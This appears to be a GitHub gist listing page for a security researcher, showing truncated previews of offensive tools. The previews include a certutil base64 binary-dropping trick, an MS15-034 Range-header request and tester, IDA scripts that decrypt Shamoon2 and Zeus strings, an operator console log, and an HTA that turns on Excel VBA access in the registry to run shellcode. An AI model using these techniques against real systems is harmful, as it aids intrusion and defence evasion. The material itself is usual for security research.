
@Kaicastledine
Kaicastledine / drop_binary.bat
Created January 25, 2017 11:17 — forked from mattifestation/drop_binary.bat
Drop binary data from the command line w/o needing PowerShell
echo -----BEGIN CERTIFICATE----- > encoded.txt
echo Just Base64 encode your binary data
echo TVoAAA== >> encoded.txt
echo -----END CERTIFICATE----- >> encoded.txt
certutil -decode encoded.txt decoded.bin
powershell -com {$wr=[Net.WebRequest]::Create('http://127.0.0.1/iisstart.htm');$wr.AddRange('bytes',18,18446744073709551615);$wr.GetResponse();$wr.close()}
@Kaicastledine
Kaicastledine / MS15-034Tester.ps1
Created January 25, 2017 11:20 — forked from Zagrophyte/MS15-034Tester.ps1
Sends a CVE-2015-1635 / MS15-034 Request and checks for vulnerability
# Sends a CVE-2015-1635 / MS15-034 Request and checks for vulnerability
function TestMS15_034($hostname, $port)
{
if ($port -eq $null)
{
$port = 80
}
$tc = New-Object Net.Sockets.TcpClient
import idc
def decrypt_n_comment(func, func_name):
"""
Decrypt and comment Shamoon2's strings
"""
data = {}
for xref in XrefsTo(LocByName(func_name)):
# init
def decrypt(func):
"""
Decryption of zeus strings
"""
ZBOT_INDEX_MIN = 0x0
ZBOT_INDEX_MAX = 0xe7
data = {}
for i in range(ZBOT_INDEX_MIN, ZBOT_INDEX_MAX):
#!/usr/bin/env python
# Rulz.py
# Author: Nick Landers (@monoxgas) - Silent Break Security
import os
import sys
import argparse
import re
import binascii
import codecs
21:25:59>> aliases
[21:25:59] ID: 331 'aliases' started [target: z0.0.0.1]
acquiretoken : LOCAL : script _AcquireToken.dss %%cmd_args%%
acquiretoken : ANY_REMOTE : script _AcquireToken.dss %%cmd_args%%
arparp : LOCAL : python windows/arparp.py -args " %%cmd_args%% " -project Ops
arparp : ANY_REMOTE : python windows/arparp.py -args " %%cmd_args%% " -project Ops
channels : LOCAL : commands %%cmd_args%%
channels : ANY_REMOTE : commands %%cmd_args%%
checkpsp : LOCAL : python windows/checkpsp.py -args " %%cmd_args%% " -project Ops
checkpsp : ANY_REMOTE : python windows/checkpsp.py -args " %%cmd_args%% " -project Ops

Keybase proof

I hereby claim:

  • I am kaicastledine on github.
  • I am kcsec (https://keybase.io/kcsec) on keybase.
  • I have a public key ASCJYGqbSLo24CpFzGCUtCpDq4hMus71-wEju9tIkcDr9Ao

To claim this, I am signing this object:

@Kaicastledine
Kaicastledine / CalcExcel.hta
Created July 24, 2017 09:59
Shellcode Execution Via HTA
<html>
<head>
<script>
var objExcel = new ActiveXObject("Excel.Application");
objExcel.Visible = false;
var WshShell = new ActiveXObject("WScript.Shell");
var Application_Version = objExcel.Version;//Auto-Detect Version
var strRegPath = "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\" + Application_Version + "\\Excel\\Security\\AccessVBOM";
WshShell.RegWrite(strRegPath, 1, "REG_DWORD");
var objWorkbook = objExcel.Workbooks.Add();